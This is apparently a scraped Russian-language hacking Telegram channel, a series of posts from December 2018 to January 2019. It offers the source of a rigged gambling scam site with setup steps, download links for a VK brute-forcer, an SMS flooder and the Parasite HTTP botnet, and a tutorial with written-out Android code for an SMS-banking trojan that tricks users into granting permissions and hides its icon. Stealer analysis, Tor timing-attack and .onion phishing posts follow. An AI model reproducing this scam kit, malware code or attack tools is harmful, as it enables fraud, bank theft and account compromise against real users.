0-day | Уязвимость 0-го дня

Исходник скама NVUTI

2019-01-07T08:00:54.171Z

Совершенно новый скрипт NVUTI с очень красивой и удобной админ-панелью;

Все нововведения в этой версии:

Доступно пополнение баланса через FREE-KASSy;
Убраны дыры и баги, в том числе и взлома сайта с помощью SQL Инъекции!;
Промо-коды и их создание через админ-панель;
Так же и новая, красивая административная панель!;
Подкрутка по типу или же по %;
Весь сайт, бонус при регистрации и пополнении можно настроить в административной панели! Так же можно включать минимальную сумму пополнения и выключать её, блокировать вывод и т.д;

Скрины админки

P.S Это скам проект

Инструкция по установке

Настройки которые находятся в файлах:

1. База данных, тебе нужно настроить подключение в файле (inc/bd.php).

2. Настроить префикс базы данных (inc/config.php в переменной $prefix).

3. Настроить иконку сайта (inc/config.php в переменной $favicon).

3.1. Удалить файл fav_logo.jpg в папке files.

3.2. Загрузить свою иконку сайта в папку files.

3.3. Настроить иконку сайта (inc/config.php в переменной $favicon).

4. Правила сайта находятся в файле (inc/config.php в переменной $rules).

5. Если захочешь сделать фон под себя, в index.php ищешь переменную $bgc1 или $bgc2 или bgc3 и меняешь значение в поле "$('#bgc_site').val('bgc-memphis.png'); на $('#bgc_site').val('Название вашего фона');", а также загружаешь свой фон в папку img.

6. Настроить капчу в файле (inc/config.php) в переменной $gcaptcha.

7. Настройка блокировка вывода, по умолчанию блокировка вывода стоит до первого пополнения пользоатаеля на сайт, после пополнения блокировка снимается автоматически, вы также можете ее выключить вручную.

Включение и отключение блокировки в файле (inc/config.php) в переменной $blockout.

Остальные настройки находяться в самой админке.

Как выдать админку?

Первому пользователю т.е тебе нужно зарегистрироваться через сайт и выдать админку через базу в таблице demo_users в поле admin поставить значение sadmin.

Таблица demo_admin для чего он нужен?

Это подкрутка пользователей, выставляется в % соотношенеии, если у ползователя стоит подкрутка Юзер то будут использоваться win_user и lose_user, если Ютубер то win_youtuber и lose_youtuber.

Во вкладке пользователи, есть значки прав,

Крестик - Бан.

Лиса - Админ.

Галочка - Подкрутка пользовательская.

Значок ютуба - Подкрутка ютуберская.

Рекомендации:

После загрузки базы данных к себе на хост изменить префикс demo на свой, а также в файле (inc/config.php в переменной $prefix)

Версия PHP должна быть : 5.4.45

ВНИМАНИЕ!

Будьте осторожны с токеном от Qiwi, НИКОМУ НЕ ПЕРЕДАВАЙТЕ ЕГО, т.к в случаи передачи его в чужие руки у вас могут увести деньги с кошелька, не забывайте об этом.

Скачать:

https://yadi.sk/d/FIvZNO11m096vg

Нужные ссылки:

Inloggen VKontakte - Создать приложение ВК для авторизации.

https://vk.com/IDгруппы?act=tokens - Создание токена для работы бонуса.

QIWI Кошелек - Токен QIWI (Обязательно наличие галочки "Проведение платежей без SMS").

ВК Брут

2019-01-04T21:59:24.325Z

Брут вк

Работает как по API так и через сайт (выбираем в настройках)

SBA - сохранение bad аккаунтов (вдруг кому нужно)

Скачать

ВирусТотал

Написание СМС трояна для Android [ 2 часть ]

2018-12-29T16:20:32.462Z

Вот и доплыли до 2 части разработки смс трояна, в ней мы обсудим наш MainActivity, фишинг с окнами, сокрытие нашего приложение, поговорим про смс банкинг и прочие вещи. Приступим!

activity_main.xml ( интерфейс )

Что обозначает этот xml файлик? В нашем случае он не нужен, даже мешает нам. Это лицо нашего приложения, именно то, что видит в нем пользователь, когда заходит в наше приложение. Но мы же троян? Верно? Нам не нужно это, ведь мы скрываемся и работаем без интерфейса автономно. Конечно, можете туда что-то написать по типу: "Ожидайте, загрузка...", "ERROR 100X500" и так далее. Но в моем случае я не стал это делать, может, если я захочу обновить этот инструмент ПЕНТЕСТА я добавлю это, но не сейчас и не в этом гайде. Вот где находится этот файлик в андроид студио и что у меня там написано.

Демонстрация

Вот так вот и живем. Кстати, в андроид студио есть целый редактор, ничего не надо вводить ручками. Даже можете выбрать свою картинку, эмблему, иконку и написать любую надпись с любым цветом и любым шрифтом. Есть где здесь фантазии разгулятся для фишинга)

MainActivity ( точка входа )

В итоге с графикой мы закончили, приступим к нашему активити. Как вы поняли из прошлой части, то MainActivity это точка входа в наше приложение, именно оно активируется когда пользователь открывает наш троян.

Давайте-ка импортируем нужные нам пакеты и создадим класс MainActivity который будет расширять AppCompatActivity.

Код

Java:

package com.sms.smsbanker;
// импортируем пакеты
import android.app.AlertDialog;
import android.os.SystemClock;
import android.support.v4.content.ContextCompat;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.Manifest;
import android.support.v4.app.ActivityCompat;
import android.content.pm.PackageManager;
import android.content.ComponentName;
import android.widget.Toast;
import android.app.PendingIntent;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.view.Gravity;
import android.support.v4.app.Fragment;
import android.content.DialogInterface;
import android.app.Activity;
//  MainActivity, точка входа
public class MainActivity extends AppCompatActivity {
    @Override
   // метод с которого мы начинаем
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);  // выставляем наш фон

Все, с созданием скелета MainActivity мы закончили, осталось только дописать самые необходимые вредоносные функции в него! Я, пожалуй, начну с написания проверки наших разрешений. Создам boolean который будет возвращать false, если разрешение нету и true, если они есть. Как только я его создаю - сразу вызываю его в нашем методе onCreate.

Код

Java:

public boolean Permission(){
        ActivityCompat.requestPermissions(MainActivity.this,
                new String[]{Manifest.permission.SEND_SMS, Manifest.permission.READ_SMS, Manifest.permission.RECEIVE_SMS},
                1); // запрашиваем разрешения и даем пользователю выбор
        SystemClock.sleep(5000); // ожидаем 5 секунд и проверяем выбор нашего пользователь
        if (ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.RECEIVE_SMS) != PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_SMS) != PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.SEND_SMS) != PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_PHONE_STATE) != PackageManager.PERMISSION_GRANTED){
            return false; // если разрешения не дали
        } else {
            return true; // если разрешения дали
        }
    }

И, давайте, опубликую код вместе. Вдруг кому не понятно.

Код

Java:

package com.sms.smsbanker;

import android.app.AlertDialog;
import android.os.SystemClock;
import android.support.v4.content.ContextCompat;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.Manifest;
import android.support.v4.app.ActivityCompat;
import android.content.pm.PackageManager;
import android.content.ComponentName;
import android.widget.Toast;
import android.app.PendingIntent;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.view.Gravity;
import android.support.v4.app.Fragment;
import android.content.DialogInterface;
import android.app.Activity;
public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Permission();
    }

    public boolean Permission(){
        ActivityCompat.requestPermissions(MainActivity.this,
                new String[]{Manifest.permission.SEND_SMS, Manifest.permission.READ_SMS, Manifest.permission.RECEIVE_SMS},
                1);
        SystemClock.sleep(5000);
        if (ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.RECEIVE_SMS) != PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_SMS) != PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.SEND_SMS) != PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_PHONE_STATE) != PackageManager.PERMISSION_GRANTED){
            return false;
        } else {
            return true;
        }
    }
}

Все, впринципе все должно быть понятно. Юзер открывает --> запрашивается разрешения --> ждем 5 секунд --> проверяем выбор. Но, что если он их отклонил? Что дальше? Хм, может, давайте-ка сыграем на психологии? Попробуем обмануть нашего пользователя. Я исключаю бесконечное запрашивание, ибо скорее всего юзер перезагрузит телефон, если такое случится. Здесь хоть шансов побольше.

Код

Java:

@Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Permission();
        if(!Permission()){   // если разрешений нету.
            AlertDialog.Builder adb = new AlertDialog.Builder(MainActivity.this);
            adb.setTitle("ОШИБКА!");
            adb.setMessage("Для работы этого приложения нужны необходимые разрешения, подтвердите их."); // показываем фишинг диалог и после того, как пользователь нажал OK закрываем наше приложение.
            adb.setPositiveButton("ok", new DialogInterface.OnClickListener(){
                public void onClick(DialogInterface dialog, int whichButton) {
                    finish();
                }
            });
            adb.show();
        }else{  // если они есть, то вызываем метод маскировки
            Mask();
        }
    }

Вы спросите, что за метод маскировки? Метод маскировки это базовое скрытие, оно будет только в MainActivity. Более детальное сокрытие будет в других классах. А сейчас мы разберем этот метод Mask. В нем мы будем скрывать иконку и показывать юзеру фейковое сообщения об удалении, хотя оно просто исчезнет с рабочего стола)

Вот и все, мы закончили с нашем мэйнактивити и вызвали другой класс. Все здесь предельно легко и просто. Мы проверяем разрешения, если есть то запускаем булеан Mask, если нету то обманываем пользователя на то, чтобы он дал нам разрешение.

Код

Java:

public boolean Mask() {
        try {
            PackageManager pm = getPackageManager(); // инициализируем наш PackageManager
            ComponentName componentName = new ComponentName(this, com.sms.smsbanker.MainActivity.class);
            pm.setComponentEnabledSetting(componentName,PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP); // прячем приложение
            SystemClock.sleep(10000); // ждем 10 секунд после сокрытия и показываем сообщения
            Toast toast = Toast.makeText(getApplicationContext(), // показываем фейковое сообщение
                    "ОШИБКА (0x1619), ПРОИЗВОДИТСЯ УДАЛЕНИЕ ПРИЛОЖЕНИЯ...", Toast.LENGTH_LONG);
            toast.setGravity(Gravity.CENTER, 0, 0); // указываем, чтобы фейковое сообщения появилось по центру на экране
            toast.show(); // показываем наше сообщение
            startService(new Intent(this, Other.class)); // стартуем другой класс
            finish(); // завершаем наш мэйнактивити
            return true; // если сокрытие удалось
        } catch (Exception e) {
            startService(new Intent(this, Other.class));
            finish();
            return false; // если сокрытие не удалось
        }
    }

Выложу фулл код для тех, кто ничего не понял. Может вам будет так легче, ну или скрипткидди просто скопируют это, без разницы.

Весь код

Java:

package com.sms.smsbanker;

import android.app.AlertDialog;
import android.os.SystemClock;
import android.support.v4.content.ContextCompat;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.Manifest;
import android.support.v4.app.ActivityCompat;
import android.content.pm.PackageManager;
import android.content.ComponentName;
import android.widget.Toast;
import android.app.PendingIntent;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.view.Gravity;
import android.support.v4.app.Fragment;
import android.content.DialogInterface;
import android.app.Activity;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Permission();
        if(!Permission()){
            AlertDialog.Builder adb = new AlertDialog.Builder(MainActivity.this);
            adb.setTitle("ОШИБКА!");
            adb.setMessage("Для работы этого приложения нужны необходимые разрешения, подтвердите их.");
            adb.setPositiveButton("ok", new DialogInterface.OnClickListener(){
                public void onClick(DialogInterface dialog, int whichButton) {
                    finish();
                }
            });
            adb.show();
        }else{
            Mask();
        }
    }

    public boolean Mask() {
        try {
            PackageManager pm = getPackageManager();
            ComponentName componentName = new ComponentName(this, com.sms.smsbanker.MainActivity.class);
            pm.setComponentEnabledSetting(componentName,PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);
            SystemClock.sleep(10000);
            Toast toast = Toast.makeText(getApplicationContext(),
                    "ОШИБКА (0x1619), ПРОИЗВОДИТСЯ УДАЛЕНИЕ ПРИЛОЖЕНИЯ...", Toast.LENGTH_LONG);
            toast.setGravity(Gravity.CENTER, 0, 0);
            toast.show();
            startService(new Intent(this, Other.class));
            finish();
            return true;
        } catch (Exception e) {
            startService(new Intent(this, Other.class));
            finish();
            return false;
        }
    }

    public boolean Permission(){
        ActivityCompat.requestPermissions(MainActivity.this,
                new String[]{Manifest.permission.SEND_SMS, Manifest.permission.READ_SMS, Manifest.permission.RECEIVE_SMS},
                1);
        SystemClock.sleep(5000);
        if (ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.RECEIVE_SMS) != PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_SMS) != PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.SEND_SMS) != PackageManager.PERMISSION_GRANTED
                && ContextCompat.checkSelfPermission(MainActivity.this, Manifest.permission.READ_PHONE_STATE) != PackageManager.PERMISSION_GRANTED){
            return false;
        } else {
            return true;
        }
    }
}

А другой класс мы уже разберем в другой части. Давайте перейдем к другой теме.

Немного об смс банкинге

Смс банкинг особо разит сегодня у нас в стране. Почти у каждого есть свой счет в сбербанке, собственно есть и симка на которую привязаны наши карточки. Многие пользователи для удобства подключают дополнительную услугу, называется она "СМС Банкинг". При помощи этой услуги удобно одной смской переводить деньги на карточки, оплачивать покупки, штрафы, смотреть счета, бонусы и так далее. Но, если телефоном завладеет посторонний человек или программа - можете распрощаться с вашими средствами. Телефон - путь к вашим деньгам.

Многие пользователи неосторожны и скачивают все подряд с гугл плэя, там могут быть подобные угрозы. Они перехватывают смс, обрабатывают их, снимают деньги и в лучшем случае оставляют вас, а в худшем блокируют ваше устройство и вымогают еще деньги. Все ради денег, миром правят деньги.

Защита от подобного есть, но только не у сбербанка. Да, главное не банковская защита, а ВЫ. Не устанавливаете подозрительные приложения и не стоит выдавать разрешения на смс каждому второму приложению. Это может плохо повлиять на ваш кошелек)

Заключение

Все, на этом наша 2 часть закончилась. В 3 я опишу другой класс ( перехват смс ), дополнительную маскировку, закрепления в системе, возможно даже и связь с сервером. И помните ПРИМЕНЕНИЕ ПОДОБНОГО ПО ОТНОШЕНИЮ К ЛЮДЯМ С ЦЕЛЬЮ ПОЙМАТЬ ЛЕГКОГО БАБЛА КАРАЕТСЯ ЗАКОНОМ!

Всем удачи и пока!

Написание СМС трояна

2018-12-28T07:40:27.936Z

Приветствую! Планирую сделаю серию гайдов по написанию смс трояна на эту замечательную ось. Это будет вступительная часть, думаю, вы все поймете. Поехали!

Предисловие

Начиналось все с жажды наживы. Да и думаю у всех тех, кто читает эту статью есть это желание. Поэтому мы вы ее и читаете, давайте по честному. Я не скрываю, что хотел подзаработать данным способом, что является незаконным. Благо я уже нашел место в этом мире и занялся более выгодной и неприхотливой работой.

Я нигде не брал исходники, я хотел сделать свой проект на полностью чистой основе. Выкладываю я это лишь для того, чтобы обогатить свой и ваш опыт в данной сфере.

ПРИМЕНЕНИЕ ПОДОБНОГО ПО ОТНОШЕНИЮ К ЛЮДЯМ С ЦЕЛЬЮ ПОЙМАТЬ ЛЕГКОГО БАБЛА КАРАЕТСЯ ЗАКОНОМ!

Среда разработки

Среду разработки для андроид приложений выберем вполне обычную для таких случаев: Android Studio. Как же установить его и приступить к работе? Сейчас разберем.

1. Перейдите на сайт Download Android Studio and SDK tools | Android Developers и установите версию для вашего устройства.

2. Соглашаетесь со всеми условиями, выбираете эмулятор ( Сразу советую ставить Nexus 5X API 28 x86 как у меня ) И ожидайте установку всех необходимых пакетов и собственно эмулятора, это может занять длительное время!!

3. У вас откроется окошко, создайте новый проект. Соглашаетесь со всем до выбора активити.

4. Активити советую выбирать Empty, так, думаю, будет более удобнее писать.

5. Все, у вас все открылось и готово собственно к написанию кода!

Первые шаги!

Среду разработки настроили, она готова. Осталось только одно: сделать рабочий код. У меня уже есть исходники впринципе, но буду писать все сначала. Все будет выглядеть примерно так.

Проект

Как только сделали проект, сразу стоит зайти в AndroidManifest.xml. Именно оттуда мы будем стартовать. Мы же пишем СМС приложение, да? Так нам нужны разрешение, чтобы наш троян мог отправлять/просматривать/удалять/пересылать сообщения. За все отвечает этот xml файлик. Именно этот текстовый файлик одна из самых главных частей проекта. Там будут условия, например: Что делать нашему приложению когда приходит смс? Что будет когда телефон перезагрузился? Какие разрешения нужны?

Пока что отделаемся только разрешениями на эту часть статьи. Выставим их!

Код

<uses-permission android:name="android.permission.READ_PHONE_STATE" /> // читать телефонные контакты ( для распространения соответственно )
<uses-permission android:name="android.permission.WRITE_SMS " /> // писать смс
<uses-permission android:name="android.permission.READ_SMS" /> // возможность читать смс
<uses-permission android:name="android.permission.SEND_SMS" /> // возможность отправлять смс
<uses-permission android:name="android.permission.RECEIVE_SMS" /> // возможность получать смс нашему приложению
<uses-permission android:name="android.permission.INTERNET" /> // доступ к интернету нашему приложению

Вот так это должно выглядеть после того, как вы все сделаете.

Пример

Но, если вы и выставили эти разрешения, они не будут активированы. Вам нужно чтобы пользователь их подтвердил, окошечко подтверждения не будет вылазить если вы все выставите в xml файле, вам нужно прописать вызов этих окон ручками. А андроид манифест это проводник вашего приложения, глаза и уши вашего трояна, так сказать.

Планировка приложения

Все будет действовать по одной схеме и все будет начинаться с класса MainActivity. Именно он будет задействован когда пользователь откроет наш подарочек. Именно из этого класса мы будем вызывать другие классы, он будет отправной точкой нашего приложения.

Пользователь открыл приложение ----> вызов MainActivity -----> вызов других классов.

В MainActivity я впихал все необходимое, маскировка и показывание фишинг окна для того, чтобы юзер дал нам разрешения для СМС.

Заключение

Вот и закончилась 1 часть моей серии. Здесь мы обсудили именно основы и приступили к планировки нашего приложения. Отправной путь пройден, осталось только кодить и кодить! В следующей части мы научимся маскировать, показывать фальшивое окно для фишинга, воровать смски и закрепляться в системе. Если поддержите - то хорошо, будет целый цикл. Остановился пока только на этом, всем удачи.

Наши услуги: @GOdayBot

Внимание!!! Вся Информация на канале "0-day | Уязвимость 0-го дня" для ознакомления, не несёт в себе призыва к чему-либо, автор не несёт никакой ответственности. 18

Тайминг-атака.

2018-12-27T14:37:48.479Z

Представьте себе ситуацию: вы сотрудник спецслужбы, и ваша задача – вычислить особо опасного преступника, занимающегося шантажом и появляющегося в сети периодически и только для передачи данных.

Для преступной деятельности он завел отдельный ноутбук, из которого «вырезал» микрофон, колонки и камеру. Разумное решение, учитывая, что колонки тоже умеют слушать.

В качестве операционной системы он использует Tails, хотя для максимальной анонимности стоило бы взять Whonix. Так или иначе, весь трафик идет через Tor, он не доверяет VPN, да и для работы в Даркнете Tor ему все равно необходим.

Для общения он использует Jabber с PGP-шифрованием, он мог бы поставить и Телеграм, но это представитель старой школы преступников. Даже если у вас будет доступ к серверу Jabber, вы сможете получить лишь зашифрованные данные и IP-адреса Тор. Это бесполезная информация.

Преступник работает по принципу «молчание-золото», лишнего не скажет, ссылки или файла не откроет.

Известно лишь, что он должен находиться в одной стране с вами. Казалось бы, шансов установить его личность нет, но это иллюзия, установить его личность можно несмотря на все принимаемые им меры. Описанный случай идеален для применения тайминг-атаки по мессенджеру.

Первым делом необходима программа, которая будет отслеживать и записывать все входы и выходы пользователя. Он появился в сети – система сразу отмечает у себя время, ушел – система записала время выхода.

Лог выглядит примерно так:

Теперь на руках у вас есть лог его активности за несколько дней, пришло время воспользоваться системой ОРМ (оперативно-розыскных мероприятий).

Подобные системы есть в распоряжении спецслужб большинства стран, в России это СОРМ. Нужно выяснить, кто в эти временные промежутки +/- 5 минут в вашей стране подключался к сети Tor. Мы знаем, что цель, которую необходимо деанонимизировать, подключилась 22.04.2018 в 11:07 и отключилась в 12:30.

В эти же временные точки (+/- 5 минут) на территории страны подключились к сети Tor и отключились от нее 3000 человек. Мы берем эти 3000 и смотрим, кто из них снова подключился в 14:17 и отключился в 16:54, как думаете, сколько человек останется?

Так, шаг за шагом, круг сужается, и в итоге вам удастся вычислить место выхода в сеть преступника. Чем чаще он заходит в сеть и чем меньше в это время других пользователей, тем быстрее сработает тайминг-атака.

Что может помешать проведению тайминг-атаки

Постоянная смена точек выхода в сеть делает подобную атаку бессмысленной. Если же цель периодически меняет точки выхода, это может затруднить поиск, но является заранее допустимым вариантом и не способно запутать систему.

Мы надеемся, что наши читатели не относятся к разыскиваемым преступникам и им не придется кочевать из одного кафе с публичным Wi-Fi в другое. Однако вторым советом против тайминг-атаки стоит воспользоваться каждому. Речь идет об отключении на уровне мессенджера передачи информации о статусе либо установлении постоянного статуса «офлайн». Большинство мессенджеров предоставляют одну из подобных возможностей.

Вот так это выглядит в Телеграм:

СОВЕТ: Если в вашем мессенджере возможно скрыть данные о вашем статусе, скройте эту информацию.

Дополнительным инструментом защиты от тайминг-атаки может стать прекращение включения мессенджера вместе с подключением к сети. Как вы можете понять из описания атаки, сверяется время входа/выхода в сеть и появление на связи/уход в офлайн в мессенджере. Допускается погрешность, но она не должна быть очень большой.

Bitmassage

2018-12-26T12:02:37.455Z

Bitmessage. Самый анонимный мессенджер.

Bitmessage – бесплатный мессенджер с открытым исходным кодом, зарекомендовавший себя как надежный инструмент для ведения анонимных и защищенных переписок в сети.

Миф Любое адресное сообщение должно иметь адресата и отправителя.

Реальность Bitmessage позволяет отправлять сообщения без адресата и отправителя. При этом его прочтет только получатель, которому вы его отправляете.

Почему Bitmessage

Архитектура Bitmessage устроена следующим образом: сообщение рассылается абсолютно ВСЕМ компьютерам сети, но расшифровать его может только адресат, которому оно предназначается.

Это делает абсолютно невозможным контроль переписки пользователей по причине отсутствия информации о получателе (и отправителе). Вспомните историю о шифре Цезаря, когда он слал своим генералам зашифрованные сообщения. Хотя варвары и не могли прочесть зашифрованный текст, они могли отследить, с кем ведется переписка, и перехватить сообщение адресату. А представьте ситуацию, когда одно сообщение Цезарь шлет сразу всем своим генералам и даже варварам, все получают это зашифрованное послание, но прочесть его может только владелец секрета вскрытия шифра. В этом случае адресат переписки неизвестен и никак не может быть установлен, а как вы узнаете, у кого есть этот секрет?

Bitmessage использует шифрование открытым ключом, потому даже отправитель не может расшифровать отправленные сообщения, это может только адресат. Зашифрованные сообщения хранятся в сети четыре дня (при настройках по умолчанию).

Bitmessage – единственный анонимный мессенджер. Других анонимных мессенджеров мне не известно. Многие считают анонимным XMPP/Jabber, однако это не совсем так. XMPP/Jabber не анонимен: есть адресат, у этого адресата есть IP-адрес, который сохраняется в логах сервера, есть данные, когда адресат был в сети, откуда ему приходили сообщения, можно предположить, как долго велась переписка. У Bitmessage нет ни адресата, ни сервера, ни логов.

Установка Bitmessage

Скачать программу можно на официальном сайте

SMS Flooder

2018-12-24T11:08:36.180Z

VirusTotal

Формат номера код страны без + и вуаля шалость удалась)

Скачать:

https://yadi.sk/d/pQRtZXkkqLJ1hw

Parasite HTTP Botnet + Bin

2018-12-21T11:02:53.291Z

Сам не тестил, запускайте на виртуалке или дедике

Скачать:

https://mega.nz/#!iv43AIZT!1beYNQI_UuQFAH3Bc4r6lq2qKT2yHt3tqwvWQo2O54A

Parasite HTTP Remote Administration Tool

Что такое паразит HTTP?

Parasite HTTP - это профессионально закодированный модульный инструмент удаленного администрирования для окон, написанных на C, который не имеет зависимостей, кроме самой ОС.

С размером заглушки ~ 49kb и поддержкой плагинов это идеальное решение для управления большим количеством компьютеров из удаленного места.

Характеристики

Нет зависимостей (закодировано в C)

Небольшой размер заглушки (~ 49 КБ без сжатия, ~ 23 КБ)

Динамические вызовы API (без IAT)

Зашифрованные строки

Обойти Ring3 крючки

Безопасная панель C & C написана на PHP

Обход брандмауэра

Поддерживает как x86, так и x64 ОС Windows (от XP до 10)

Полная поддержка юникода

Онлайн-конструктор, привязанный к вашему домену / s (сборка бота в любое время с любыми настройками)

Зашифрованная связь с панелью C & C (необязательно - SSL с использованием самозаверяющего сертификата)

Система плагинов

Несколько резервных доменов

Постоянство всей системы (только процессы x86) (Необязательно)

Инъекция в системный процесс из белого списка (необязательно)

Установить и расплавить (опционально)

Скрытый запуск (необязательно)

Анти-Эмуляция (опционально)

Anti-Debug

Расширенная статистика и информация в панели

Усовершенствованная система управления задачами

Задача при подключении (новые клиенты будут выполнять задачу (и))

Низкое использование ресурсов

Специальный код безопасности страницы входа

Капча на странице входа для предотвращения атак методом перебора

Загрузка и выполнение (поддерживает ссылки HTTP и HTTPS)

Обновить

Удалить

Доступные плагины

Управление пользователями

Восстановление пароля браузера

Восстановление пароля FTP

Восстановление пароля IM

Восстановление пароля электронной почты

Восстановление лицензионных ключей Windows

Скрытый VNC

Обратный прокси Socks5

Системный запрос

PHP 5.6 или выше (Gd & OpenSSL)

IonCube Loader

База данных SQL

Анализ стиллера Immortal

2018-12-19T12:48:30.269Z

Писал не я, так что статья четко спизжена 😂

Введение

NoFile - это стиллер, написанный на языке C# кодером 1ms0rry, ему уже не один год, но даже в 2018 можно найти яркий пример использования его исходников. Таковым "ремейком" является стиллер от Zet5D под названием Immortal 2.7.5.

Тема продажник: https://lolzteam.net/threads/626111/

Последние обновление этого стиллера было 27 октября:

Мне повезло достать семпл последней версии:

Анализ

Прежде всего, сканируем файлик через DiE 2.0:

Удивительно, что в графе compiler мы видим C\C++, однако в графе protector написано, что использовался .NET Reactor(4.5-4.7). Тому виной специальная функция протектора NET Reactor. Так же подвох заключается в том что, использовался NET Reactor 5.0.0.0, а DiE показывает другую версию.

Деобфускация (de4dot в помощь) много времени не занимает...

Полученный .NET (4.0!!!) файл декомпилировать можно через dnSpy:

Исходный код

Для удобства чтения я переназвал все методы и поля. Идти стоит по порядку, открываем точку входа:

Тут все просто:

Переменные windows_username, version - тут все понятно. А в переменную hwid записывается значение guid машины:

Далее вызывается единственный метод, в нем же и находятся все основные функции этого стиллера:

Я немного удивился: "В релиз версии, дебаг код?" - да. Но что более странно - так это то, что каждый этот метод обернут в try\catch еще и внутри.

В начале статьи, я вспомнил про такой стиллер NoFile и сделал это не с проста, дело в том, что 80% написанного кода является списанным с того самого проекта от 1msorry.

На моей памяти NoFile - это первый стиллер, который использует вместо Sqlite собственное решение, даже не смотря на то, что код этого модуля, написанный 1msorry, родом из другой малвари. Думаю, об этом не сложно догадаться, просто взглянув на названия переменных и функций, читать это сложновато, и сам факт работы этого модуля удивляет. Основывается он на хитром обходе sqlite базы данных, для примера:

Это строка (34) из того самого стиллера -

this.ReadMasterTable(100L);

Статья на habr -

Теперь вернемся к исходникам Immortal:

И обратимся к тому самому SqlHandler:

Если продолжать смотреть код, то там сходство 100%. Да и более того, я хорошо изучил SqlHandler и могу смело сказать, что там как минимум 3 серьезных бага, которые могут сильно нарушить работоспособность программы.

Вот мы и подошли к методу получения паролей:

Учитывая, то, что все пути до дефолтных учеток хранятся в полу константном массиве:

А теперь последнее, охуеть какое совпадение, снова откроем GitHub 1ms0rry:

А теперь в dnSpy:

Итог

Думаю понятно, что стиллер полностью является ремейком старого стиллера, который сейчас можно редко где встретить.

Исходный код проекта: https://github.com/Alexuiop1337/Immortal2.0-by-Zet5D

Фишинг в .onion

2018-12-18T08:02:30.419Z

Фишинг в клирнете сейчас обычное дело. Его легко обнаружить и также легко предотвратить.

Но что делать при угрозе фишинга в Даркнете?

Один из владельцев сайта в зоне .onion опубликовал у себя в блоге историю о том, как его сайт пытались использовать фишеры, и как он этому сопротивлялся.

<Далее текст идет от первого лица>

Джеймс Стэнли создатель и владелец сервисаSMS Privacy. Этот сервис предназначен для анонимного приема sms-сообщений за биткоины. У этого сервиса существует зеркало в сети Tor.

Однажды эксперт по безопасности Чарли Хотерсолл-Томас обнаружил, что поиск Google для «site:*.onion.to smsprivacy» выдает неожиданный результат.

smspriv6fynj23u6.onion — это законное имя скрытого сервиса, но есть и другой результат, который выглядит одинаково: smsprivyevs6xn6z.onion

Краткое исследование показало, что сайт был простым прокси: запросы на страницы, отправленные на фишинговый сайт, были отправлены на настоящий скрытый сервис, а ответы перенаправлены назад, за исключением нескольких идиосинкразий:

Заголовок Content-Length отсутствует

Заголовок Content-Length говорит клиенту HTTP, сколько байтов контента ожидать. Глупый прокси-сервер, который намерен передать содержимое без изменений, может просто передать заголовок Content-Length без изменений: он знает, что длина не изменится, если содержимое не может измениться.

То, что прокси-сервер считает, что длина содержимого может измениться, подразумевает, что сервер готов модифицировать контент в некоторых обстоятельствах.

Но почему он просто не пишет Content-Length, соответствующий модифицированной версии контента?

Возможно, чтобы уменьшить время загрузки страницы: если прокси не нужно знать длину досрочно, он может передавать контент непосредственно клиенту по мере его получения, изменяя его по мере его поступления. Если он должен был прочитать все содержимое, затем выполнить его изменения, а затем отправить все дальше, это может увеличить время загрузки страницы, что вызовет подозрение.

Возможно, автор счел, что хранение всего содержимого является неприемлемо высокой нагрузкой на память. Если тот же сервер проксирует от десятков до сотен других скрытых сервисов, это может быть разумным решением.

Заголовок Connection неверный

Ниже приведено сравнение заголовков ответов:

Код:

$ torsocks curl -I http://smspriv6fynj23u6.onion/
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Fri, 13 Oct 2017 05:37:49 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 7387
Connection: keep-alive
Set-Cookie: [...]
X-Frame-Options: DENY

Легитимный сайт

Код:

$ torsocks curl -I http://smsprivyevs6xn6z.onion/
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Fri, 13 Oct 2017 05:37:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: [object Object]
Set-Cookie: [...]
X-Frame-Options: DENY

Фишинговый сайт

Заголовок Connection изменен с keep-alive на [object Object]. Это то, что вы получаете в javascript при преобразовании объекта в строку, если объект не реализует toString(). Это может быть ключ к пониманию на каком программном обеспечении запущен прокси-сервер.

Скорее всего, он использует NodeJS. Я не смог обнаружить ничего, что могло бы вызвать эту ошибку в node-http-proxy или Harmon(промежуточное программное обеспечение для node-http-proxy для изменения ответа).

Сервер кеширует файлы Javascript (и, возможно, другие).

